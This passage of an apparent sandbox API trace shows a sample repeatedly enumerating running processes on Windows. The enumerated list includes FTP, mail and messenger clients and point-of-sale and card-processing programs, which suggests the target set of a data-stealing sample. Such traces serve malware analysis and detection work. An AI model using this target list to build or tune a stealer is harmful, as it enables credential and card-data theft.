szExeFile="sppsvc.exe")) returned 1 [0179.812] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.815] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.818] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0179.820] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0179.823] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0179.825] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0179.874] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0179.875] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0179.877] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0179.878] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0179.880] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0179.881] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0179.883] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0179.884] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0179.885] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0179.887] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0179.888] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0179.890] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0179.892] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0179.894] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0179.895] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0179.897] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0179.898] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0179.900] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0179.902] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0179.904] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0179.906] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0179.913] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0179.914] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0179.916] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0179.918] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0179.920] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0179.922] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0179.932] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0179.934] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0179.936] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0179.938] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0179.940] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0179.942] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0179.944] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0179.946] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0179.948] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0179.949] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0179.951] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0179.953] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0179.958] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0179.959] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0179.961] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0179.963] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0179.965] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0179.967] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0179.969] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0179.971] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0179.972] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0179.974] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0179.976] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0179.978] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0179.979] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0179.981] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0179.983] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0179.985] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0179.987] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0179.988] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0179.990] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0179.992] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0179.996] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0180.021] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0180.024] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0180.025] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0180.027] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0180.029] Process32Next (in: hSnapshot=0x1234, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0180.030] CloseHandle (hObject=0x1234) returned 1 [0180.030] Sleep (dwMilliseconds=0x64) [0180.158] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x79c [0180.170] Process32First (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0180.172] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0180.174] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0180.176] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.178] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0180.180] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0180.181] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0180.183] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0180.185] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0180.186] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.188] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.189] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0180.191] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.193] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, 